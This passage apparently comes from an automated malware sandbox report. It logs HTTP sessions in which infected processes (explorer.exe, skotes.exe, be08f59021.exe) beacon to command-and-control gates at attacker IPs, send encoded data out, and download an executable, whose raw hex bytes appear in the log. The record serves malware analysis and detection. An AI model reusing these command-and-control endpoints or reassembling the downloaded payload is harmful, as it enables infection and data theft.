                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:47.060255051 CET1236INData Raw: 02 03 7d 71 00 00 04 2a 1e 02 7b 72 00 00 04 2a 22 02 03 7d 72 00 00 04 2a 1e 02 28 30 01 00 0a 2a 1e 02 7b 73 00 00 04 2a 22 02 03 7d 73 00 00 04 2a 1e 02 7b 74 00 00 04 2a 22 02 03 7d 74 00 00 04 2a 1e 02 7b 75 00 00 04 2a 22 02 03 7d 75 00 00
                                                                                                                                                                                                                                                                                        Data Ascii: }q*{r*"}r*(0*{s*"}s*{t*"}t*{u*"}u*N(((*(*z,{v,{vo/(*(5*"}x*N{o9o<&*{|*f}|{{|o*2{o?*{o9(
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:47.060266018 CET896INData Raw: 0a 02 02 fe 06 5d 01 00 06 73 89 00 00 0a 28 95 00 00 0a 02 16 28 97 00 00 0a 2a e6 02 72 a8 0f 00 70 7d 9f 00 00 04 02 72 a8 0f 00 70 7d a1 00 00 04 02 72 a8 0f 00 70 7d a2 00 00 04 02 72 a8 0f 00 70 7d a3 00 00 04 02 28 18 01 00 0a 02 28 81 01
                                                                                                                                                                                                                                                                                        Data Ascii: ]s((*rp}rp}rp}rp}((*{*{*{*"}*{*"}*{*(dt%r2poeoftog*z,{,{o/(*rp}rp}sm}
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:47.060283899 CET1236INData Raw: 00 04 6f 9a 00 00 0a 1b 58 28 01 01 00 0a 02 28 b0 01 00 06 2a b2 02 28 ca 01 00 06 2c 12 02 7b cc 00 00 04 02 7b c2 00 00 04 6f 6f 00 00 0a 2a 02 7b cc 00 00 04 02 28 a9 01 00 06 6f 6f 00 00 0a 2a 1e 02 7b c4 00 00 04 2a 1e 02 7b c5 00 00 04 2a
                                                                                                                                                                                                                                                                                        Data Ascii: oX((*(,{{oo*{(oo*{*{*J{ooo*J{oxo*{o((,{o*rp*6{o*2{o|*6{o}*v{o~}{o~*6{o
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:47.060318947 CET1236INData Raw: 00 00 04 6f 77 00 00 0a 2a ba 02 7b f9 00 00 04 03 6f 79 00 00 0a 02 7b f9 00 00 04 02 7b f9 00 00 04 6f 77 00 00 0a 02 6f 78 00 00 0a 28 2b 00 00 06 6f 79 00 00 0a 2a 32 02 7b fa 00 00 04 6f bd 00 00 0a 2a 36 02 7b fa 00 00 04 03 6f c1 00 00 0a
                                                                                                                                                                                                                                                                                        Data Ascii: ow*{oy{{owox(+oy*2{o*6{o*J{ooo*z,{,{o/(z*B#su(v*B{(L*{*:}(M*{*}o,o(N(+}(M
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:47.060461998 CET1236INData Raw: 02 7b 23 01 00 04 03 6f 6f 00 00 0a 02 7b 24 01 00 04 02 7b 23 01 00 04 6f f2 00 00 0a 6f 6f 00 00 0a 2a 32 02 7b 23 01 00 04 6f f2 00 00 0a 2a aa 02 03 7d 1f 01 00 04 02 7b 22 01 00 04 02 7b 1f 01 00 04 28 29 00 00 06 02 7b 23 01 00 04 02 7b 1f
                                                                                                                                                                                                                                                                                        Data Ascii: {#oo{${#ooo*2{#o*}{"{(){#{()*{*6{"oo*2{"o*z,{!,{!o/(z*nd}%(r((2*{&*f}({+{(()*{(*f}){,{
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:47.060473919 CET1236INData Raw: 03 00 06 2a 1e 02 7b 54 01 00 04 2a 96 02 03 7d 54 01 00 04 02 7b 56 01 00 04 02 7b 54 01 00 04 28 29 00 00 06 02 02 7b 54 01 00 04 28 29 00 00 06 2a f6 02 7b 56 01 00 04 02 28 99 00 00 0a 02 7b 52 01 00 04 5a 02 7b 53 01 00 04 5b 6f d6 00 00 0a
                                                                                                                                                                                                                                                                                        Data Ascii: *{T*}T{V{T(){T()*{V({RZ{S[o{V{T(){T()*2{Vo*6{Voo*{R*{S*z,{U,{Uo/(z*R}Y((?*n}Y(o(?*"}W
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:47.060486078 CET896INData Raw: 01 00 0a 7d a5 01 00 04 02 73 fb 01 00 0a 7d a6 01 00 04 02 28 18 01 00 0a 02 6f a8 03 00 06 2a d6 02 73 fa 01 00 0a 7d 94 01 00 04 02 73 fa 01 00 0a 7d a5 01 00 04 02 73 fb 01 00 0a 7d a6 01 00 04 02 28 18 01 00 0a 03 02 6f 19 01 00 0a 02 6f a8
                                                                                                                                                                                                                                                                                        Data Ascii: }s}(o*s}s}s}(oo*ss}{o{rpo{o*{os}{o(*j,3os**os*{*"}*F(
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:47.180282116 CET1236INData Raw: 02 03 7d d1 01 00 04 2a 1e 02 7b d2 01 00 04 2a 22 02 03 7d d2 01 00 04 2a 1e 02 7b d3 01 00 04 2a 22 02 03 7d d3 01 00 04 2a 1e 02 7b d4 01 00 04 2a 22 02 03 7d d4 01 00 04 2a 1e 02 7b d5 01 00 04 2a 22 02 03 7d d5 01 00 04 2a 1e 02 7b d6 01 00
                                                                                                                                                                                                                                                                                        Data Ascii: }*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        75192.168.2.1050120185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:45.641004086 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:45.761524916 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:47.245667934 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:46 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        76192.168.2.1050124185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:47.472443104 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:47.592431068 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:48.933355093 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:48 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        77192.168.2.1050125185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:48.268847942 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:49.598033905 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:49 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        78192.168.2.105012680.82.65.70805584C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:48.502044916 CET392OUTGET /soft/download HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                                                        User-Agent: s
                                                                                                                                                                                                                                                                                        Host: 80.82.65.70
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:50.078233957 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:49 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="soft";
                                                                                                                                                                                                                                                                                        Content-Length: 1502720
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_"00O `@ @`LOO` 0O H.text/ 0 `.rsrc`2@@.reloc @BOHh~DU (*(*~-rp(os~*~**j(r=p~ot*j(rMp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*~*(*Vs(t*N(((*0f(8Mo9:oo-
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:50.078246117 CET1236INData Raw: 61 02 7b 11 00 00 04 1b 8d 3c 00 00 01 25 16 09 6f 1f 00 00 0a a2 25 17 72 2f 01 00 70 a2 25 18 11 05 28 12 00 00 06 a2 25 19 72 33 01 00 70 a2 25 1a 11 04 28 12 00 00 06 a2 28 20 00 00 0a 6f 21 00 00 0a 02 7b 12 00 00 04 11 05 1f 64 6a 5a 11 04
                                                                                                                                                                                                                                                                                        Data Ascii: a{<%o%r/p%(%r3p%(( o!{djZ[("o#83^{<%o%r/p%(%r3p%(( o!{djZ[("o#+`3\{<%o%r/p%(%r3
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:50.078253031 CET1236INData Raw: 7b 17 00 00 04 19 6f 48 00 00 0a 02 7b 17 00 00 04 16 6f 49 00 00 0a 02 7b 17 00 00 04 72 1d 02 00 70 6f 4a 00 00 0a 02 7b 17 00 00 04 28 4b 00 00 0a 6f 4c 00 00 0a 02 7b 17 00 00 04 28 4d 00 00 0a 6f 4e 00 00 0a 02 7b 17 00 00 04 72 35 02 00 70
                                                                                                                                                                                                                                                                                        Data Ascii: {oH{oI{rpoJ{(KoL{(MoN{r5p"AsOoP{(<oQ{rKpoRtPoS{oT{oU{oV{oW{oX{oY{#oZ{o
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:50.078277111 CET672INData Raw: 45 00 00 0a 02 7b 08 00 00 04 72 39 03 00 70 6f 21 00 00 0a 02 7b 09 00 00 04 28 46 00 00 0a 6f 47 00 00 0a 02 7b 09 00 00 04 28 3c 00 00 0a 6f 39 00 00 0a 02 7b 09 00 00 04 19 6f 48 00 00 0a 02 7b 09 00 00 04 16 6f 49 00 00 0a 02 7b 09 00 00 04
                                                                                                                                                                                                                                                                                        Data Ascii: E{r9po!{(FoG{(<o9{oH{oI{rqpoJ{(KoL{(MoN{r5p"AsOoP{(<oQ{rypoRtPoS{oT{oU{oV{oW
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:50.078282118 CET1236INData Raw: 0a 00 00 04 28 4d 00 00 0a 6f 4e 00 00 0a 02 7b 0a 00 00 04 72 35 02 00 70 22 00 00 04 41 16 19 16 73 4f 00 00 0a 6f 50 00 00 0a 02 7b 0a 00 00 04 28 3c 00 00 0a 6f 51 00 00 0a 02 7b 0a 00 00 04 06 72 eb 03 00 70 6f 52 00 00 0a 74 50 00 00 01 6f
                                                                                                                                                                                                                                                                                        Data Ascii: (MoN{r5p"AsOoP{(<oQ{rpoRtPoS{oT{oU{oV{oW{oX{oY{#oZ{o[{#V@o\{o]{^s>o?{
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:50.078288078 CET1236INData Raw: 6f 74 00 00 0a 02 7b 12 00 00 04 20 5e 01 00 00 1f 1d 73 3e 00 00 0a 6f 3f 00 00 0a 02 7b 12 00 00 04 1c 1e 1c 1e 73 40 00 00 0a 6f 41 00 00 0a 02 7b 12 00 00 04 1f 64 6f 75 00 00 0a 02 7b 12 00 00 04 72 47 05 00 70 6f 42 00 00 0a 02 7b 12 00 00
                                                                                                                                                                                                                                                                                        Data Ascii: ot{ ^s>o?{s@oA{dou{rGpoB{(vow{ g4sCoD{oE{o#{oi{r5p"dAsOoP{s>o?{s@oA{rmpoB{
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:50.078298092 CET1236INData Raw: 04 1a 1b 1a 1b 73 40 00 00 0a 6f 41 00 00 0a 02 7b 19 00 00 04 72 67 06 00 70 6f 42 00 00 0a 02 7b 19 00 00 04 20 de 03 00 00 20 ba 02 00 00 73 43 00 00 0a 6f 44 00 00 0a 02 7b 19 00 00 04 1f 11 6f 45 00 00 0a 02 7b 15 00 00 04 17 6f 7c 00 00 0a
                                                                                                                                                                                                                                                                                        Data Ascii: s@oA{rgpoB{ sCoD{oE{o|{o}{(~o{(ao{(~o{(o9{rupoRtPo{rpo{(KoL{r5p"|AsOo
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:50.078304052 CET1236INData Raw: 04 02 73 2e 00 00 0a 7d 25 00 00 04 02 73 2e 00 00 0a 7d 26 00 00 04 02 73 2d 00 00 0a 7d 28 00 00 04 02 73 95 00 00 0a 7d 2b 00 00 04 02 73 96 00 00 0a 7d 2a 00 00 04 02 73 97 00 00 0a 7d 29 00 00 04 02 73 30 00 00 0a 7d 2c 00 00 04 02 7b 1d 00
                                                                                                                                                                                                                                                                                        Data Ascii: s.}%s.}&s-}(s}+s}*s})s0},{o4{o5{"o4{(o4{,o5(4{o6{o7{(jo9{o:{o;{o:{o;{o:{ o;
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:50.078608036 CET1236INData Raw: 7b 27 00 00 04 28 3c 00 00 0a 6f 39 00 00 0a 02 7b 27 00 00 04 19 6f 48 00 00 0a 02 7b 27 00 00 04 16 6f 49 00 00 0a 02 7b 27 00 00 04 72 1d 02 00 70 6f 4a 00 00 0a 02 7b 27 00 00 04 28 4b 00 00 0a 6f 4c 00 00 0a 02 7b 27 00 00 04 28 4d 00 00 0a
                                                                                                                                                                                                                                                                                        Data Ascii: {'(<o9{'oH{'oI{'rpoJ{'(KoL{'(MoN{'r5p"AsOoP{'(<oQ{'rKpoRtPoS{'oT{'oU{'oV{'oW{'oX{'oY{'#
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:50.078620911 CET1236INData Raw: 45 00 00 0a 02 7b 24 00 00 04 72 39 03 00 70 6f 21 00 00 0a 02 7b 25 00 00 04 28 38 00 00 0a 6f 47 00 00 0a 02 7b 25 00 00 04 28 5f 00 00 0a 6f 39 00 00 0a 02 7b 25 00 00 04 19 6f 48 00 00 0a 02 7b 25 00 00 04 16 6f 49 00 00 0a 02 7b 25 00 00 04
                                                                                                                                                                                                                                                                                        Data Ascii: E{$r9po!{%(8oG{%(_o9{%oH{%oI{%rqpoJ{%(KoL{%(MoN{%r5p"AsOoP{%(<oQ{%rypoRtPoS{%oT{%oU{%oV{%oW
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:50.198463917 CET1236INData Raw: 7b 28 00 00 04 1a 1b 1a 1b 73 40 00 00 0a 6f 41 00 00 0a 02 7b 28 00 00 04 72 67 06 00 70 6f 42 00 00 0a 02 7b 28 00 00 04 20 92 03 00 00 20 6a 02 00 00 73 43 00 00 0a 6f 44 00 00 0a 02 7b 28 00 00 04 1e 6f 45 00 00 0a 02 7b 2b 00 00 04 20 8f 01
                                                                                                                                                                                                                                                                                        Data Ascii: {(s@oA{(rgpoB{( jsCoD{(oE{+ |s>o?{+s@oA{+ropoB{+p#sCoD{+oE{+rpo!{+o{+,sgoh{* *s>o?


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        79192.168.2.1050127185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:49.159625053 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:49.279393911 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:50.885240078 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:49 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        80192.168.2.1050128185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:51.109973907 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:51.229820967 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:52.725106001 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:51 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        81192.168.2.1050130185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:51.350697994 CET306OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39
                                                                                                                                                                                                                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:52.715373039 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:52 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        82192.168.2.1050131185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:52.953471899 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:53.073352098 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:54.663831949 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:53 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        83192.168.2.1050133185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:54.577158928 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:55.898929119 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:55 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        84192.168.2.1050134185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:54.890091896 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
